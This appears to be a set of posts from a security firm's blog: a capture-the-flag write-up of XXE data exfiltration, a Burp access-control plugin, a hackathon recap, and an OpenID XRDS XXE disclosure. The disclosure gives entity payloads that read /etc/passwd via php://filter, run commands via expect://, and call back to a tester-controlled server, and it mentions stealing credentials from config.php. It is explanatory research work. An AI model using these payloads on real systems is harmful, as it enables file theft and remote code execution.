We recently ran our Black Hat challenge where the ultimate prize was a seat on one of our training courses at Black Hat this year. This would allow the winner to attend any one of the following:
Simply trying out this feature and viewing how it functions. Viewing the feed tester result, we noticed that the contents of the XML formatted RSS feed were echoed and it became clear that this may be vulnerable to XXE. The first step would be to try a simple XML payload such as:
It looks like we have some more XML being submitted.. Again we tried XXE and found that using "file://" in our payload created an error. There were ways around this, however the returned data would be truncated and we would not be able to see the full contents of flag2.txt... When stuck with XXE and not being able to see the result (or complete result) there is always the chance that we can get the data out via the network. To do this we needed to generate a payload that would allow us to fetch an external DTD and then "submit" the contents of our target file to a server under our control. Our payload on our server looked like this:
As soon as the XML decoder parsed our malicious payload, we would receive the base64 encoded contents on our server:
Now it was a simple matter of decoding the payload and we had the second flag. This was not the only way to get flag 2! It was the most "fun" way of doing it though and used a really handy method. Remember it for your next pentest...
The two runners up who both can claim one of our awesome 2014 t-shirts:
Vitaly aka @send9
Sash aka @secdefect
This is a tool that I have wanted to build for at least 5 years. Checking my archives, the earliest reference I can find is almost exactly 5 years ago, and I've been thinking about it for longer, I'm sure.
Finally it has made it out of my head, and into the real world!
Be free! Be free!
So, what does it do, and how does it do it?
The core idea for this tool comes from the realisation that, when reviewing how web applications work, it would help immensely to be able to know which user was actually making specific requests, rather than trying to just keep track of that information in your head (or not at all). Once you have an identity associated with a request, that enables more powerful analysis of the requests which have been made.
In particular, it allows the analyst to compare requests made by one user, to requests made by another user, even as those users log in and log out.
There are various ways in which users can be authenticated to web applications, and this extension doesn't try to handle them all, not just yet, anyway. It does handle the most common case, though, which is forms-based auth, with cookie-based session identifiers.
So, as a first step, it allows you to identify the "log in" action, extract the name of the user that is authenticating, and associate that identity with the session ID until it sees a "log out" action. Which is pretty useful in and of itself, I think. Who hasn't asked themselves, while reviewing a proxy history: "Now which user was I logged in as, when I made this request?" Or: "Where is that request that I made while logged in as 'admin'?"
So, how does it do this? Unfortunately, the plugin doesn't have AI, or a vast database of applications all captured for you, with details of how to identify logins and logouts. But it does have the ability to define a set of rules, so you can tell it how your app behaves. These rules can be reviewed and edited in the "Options" tab of the Identity extension.
What sort of rules do we need? Well, to start with, what constitutes a valid logon? Typically, that may include something like "A POST to a specified URL, that gets a 200 response without the text 'login failed' in it". And we need to know which form field contains the username. Oh, and the sessionid in use by the application, so that the next time we see a sessionid with the same value, we can link that same identity to that conversation as well.
The easiest way to create the login rule is probably via the Http Proxy History tab. Just right click on a valid login request, and choose "Identity -> create login rule". It will automatically create a rule that matches the request method, request path, and the response status. Of course, you can customise it as you see fit, adding simple rules (just one condition), or complex rules (this AND that, this OR that), nested to arbitrary levels of complexity. And you can select the session id parameter name, and login parameter name on the Options tab as well.
Awesome! But how do we identify when the user logs out? Well, we need a rule for that as well, obviously. This can often be a lot simpler to identify. An easy technique is just to look for the text of the login form! If it is being displayed, you're very unlikely to be logged in, right? That can also catch the cases where a session gets timed out, but for the moment, we have separate rules and states for "logged out" and "timed out". That may not be strictly necessary, though. Again, these rules can be viewed and edited in the Options tab. Another easy way to create the logout rule is to select the relevant text in the response, right-click, and choose "Identity -> create logout rule".
Sweet! So now we can track a series of conversations from an anonymous user, through the login process, through the actions performed by the person who was logged in, through to the end of that session, whether by active logout, or by inactivity, and session timeout, back to an anonymous user.
Most interestingly, though, by putting the conversations into a "spreadsheet", and allowing you to create a pivot table of selected parameters vs the identity of the person making the request, it becomes possible to almost automate the testing of access control rules.
This tool is not quite at the "automated" stage yet, but it does currently allow you to see which user has performed which actions, on which subject, which makes it almost trivial to see what each user is able to do, and then formulate tests for the other users. You can also see which tests you have executed, as the various cells in the pivot table start filling up.
In this screenshot, we are pivoting on the path of the URL, the method (GET vs POST), and then a bunch of parameters. In this application (WordPress, just for demonstration purposes), we want the "action" parameter, as well as the parameter identifying the blog post being operated on. The "action" parameter can appear in the URL, or in the Body of the request, and the "post" parameter in the URL identifies the blog post, but it is called post_ID in the body. (It might be handy to be able to link different parameters that mean the same thing, for future development!). The resulting table creates rows for each unique parameter combination, exactly as one would expect in an Excel pivot table.
Clicking on each cell allows you to get a list of all the conversations made by that userid, with the specific combination of parameters and values, regardless of the number of times that they had logged in and out, or how many times their session id changed. Clicking on each conversation in the list brings up the conversation details in the request/response windows at the bottom, so you can check the minutiae, and if desired, right-click and send them to the repeater for replay.
So far, the approach has been to manually copy and paste the session cookie for a different user into the repeater window before replaying the request, but this is definitely something that lends itself to automation. A future development will have an option to select "current" session tokens for identified users, and substitute those in the request before replaying it.
So far, so good! But, since the point of this extension is to check access controls, we'd ideally like to be able to say whether the replayed request was successful or not, right? There's a rule for that! Or there could be, if you defined them! By defining rules that identify "successful" requests vs "failed" requests, conversations can be tagged as successful or not, making it easier to see when reviewing lists of several conversations. Future development is intended to bring that data "up" into the pivot table too, possibly by means of colouring the cells based on the status of the conversations that match. That could end up showing a coloured matrix of successful requests for authorised users, and unsuccessful requests for unauthorised users, which, ultimately, is exactly what we want.
We'd love to hear how you get on with using this, or if you have any feature requests for the plugin. For now, the BurpId plugin is available here.
The course has undergone the full reloaded treatment, with our trainers pouring new tips, tricks and skills into the course, along with incorporating feedback from previous students.
The training introduces all the core skills required to test applications across the major mobile platforms, particularly:
For a full break-down of the course structure check-out our BlackHat training page (https://www.blackhat.com/us-14/training/hacking-by-numbers-reloaded-mobile-bootcamp.html)
Your trainers will be Etienne (@kamp_staaldraad) and Jurgens, both crazy about mobile security and have executed numerous killshots on all the major mobile platforms.
- Etienne and Jurgens -
A few years ago we made the difficult, and sometimes painful, shift to enable remote working in preparation for the opening of our UK and Cape Town offices. Some of you probably think this is a no-brainer, but the benefit of being in the same room as your fellow hackers can't be overlooked. Being able to call everyone over to view an epic hack, or to ask for a hand when stuck is something tools like Skype fail to provide. We've put a lot of time into getting the tech and processes in place to give us the "hackers in the same room" feel, but this needs to be backed with some IRL interaction too.
People outside of our industry seem to think of "technical" people as the opposite of "creative" people. However, anyone who's slung even a small amount of code, or even dabbled in hacking will know this isn't true. We give our analysts "20% time" each month to give that creativity an outlet (or to let on-project creativity get developed further). This is part of the intention of SenseCon: a week of space and time for intense learning, building, and just plain tinkering without the stresses of report deadlines or anything else.
But, ideas need input, so we try to organise someone to teach us new tricks. This year that was done by Schalk from House 4 Hack (these guys rocks) who gave us some electronic and Arduino skills and some other internal trainings. Also, there's something about an all-nighter that drives creativity, so much so that some Plakkers used to make sure they did one at least once a month. We use our hackathon for that.
Our hackathon's setup is similar to others - you get to pitch an idea, see if you can get two other team mates on board, and have 24 hours to complete it. We had some coolness come out of this last year and I was looking forward to seeing what everyone would come up with this time round.
Copious amounts of energy drinks, snacks, biltong and chocolates were on supply and it started after dinner together. The agreed projects were are listed below, with some vagueness, since this was internal after all :)
Keiran and Dane put our office discone antenna to good use and implemented some SDR-fu to pick up aeroplane transponder signals and decode them. They didn't find MH370, but we now have a cool plane tracker for SP.
Using wifi-deauth packets can be useful if you want to knock a station (or several) off a wifi network. Say you wanted to prevent some cheap wifi cams from picking you up ... Doing this right can get complicated when you're sitting a few km's away with a yagi and some binoculars. Charl got an arduino to raise a flag when it was successfully deauthed, and lower it when connectivity is restored for use in a wifi-shootout game.
Panda (Jeremy) and Sara ended up building local Maltego transforms that would allow mass/rapid scanning of large netblocks so you can quickly zoom in on the most vulnerable boxes. No countries were harmed in the making of this.
gcp and et decided on some good ol'fashioned fuzz-n-find bug hunting on a commercial mail platform, and websense. Along the way they learned some interesting lessons in how not to fuzz, but in the end found some coolness.
The hackathon went gangbusters; most of the team went through the night and into the morning (I didn't, getting old and crashed at 2am). Returning that morning to see everyone still hacking away on their projects (and a few hacking away on their snoring) was amazing.
Once the 24-hours was up, many left the office to grab a shower and refresh before having to present to the entire company later on that afternoon.
Overall this years SenseCon was a great success. Some cool projects/ideas were born, a good time was had AND we even made Charl feel young again. As the kids would say, #winning
Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a 'discovery' of the user's identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:
Whereas the Yadis discovery relies on a XRDS document:
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I'm not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and 'executed'.
From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using http://www.xmlvalidation.com/index.php)
In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>. To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.
It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo's Facebook success. A small modification was made to our XXE payload by changing the Entity description for our 'a' entity as follows: <!ENTITY a SYSTEM 'php://filter/read=convert.base64-encode/resource=/etc/passwd'>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.
The first run with this modified payload didn't yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user's browser to return to the site which initiated the OpenID discovery. As I'd just created a simple python web server with no intelligence, this wasn't happening. Fortunately this behaviour could be emulated by hitting 'back' in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.
Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.
This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM 'expect://id'>, which should execute the system command 'id'. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). Not too sure how often this is the case but other attempts at RCE haven't been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.
And Boom goes the dynamite.
All in all a really fun vulnerability to play with and a good reminder that data validation errors don't just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:
A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html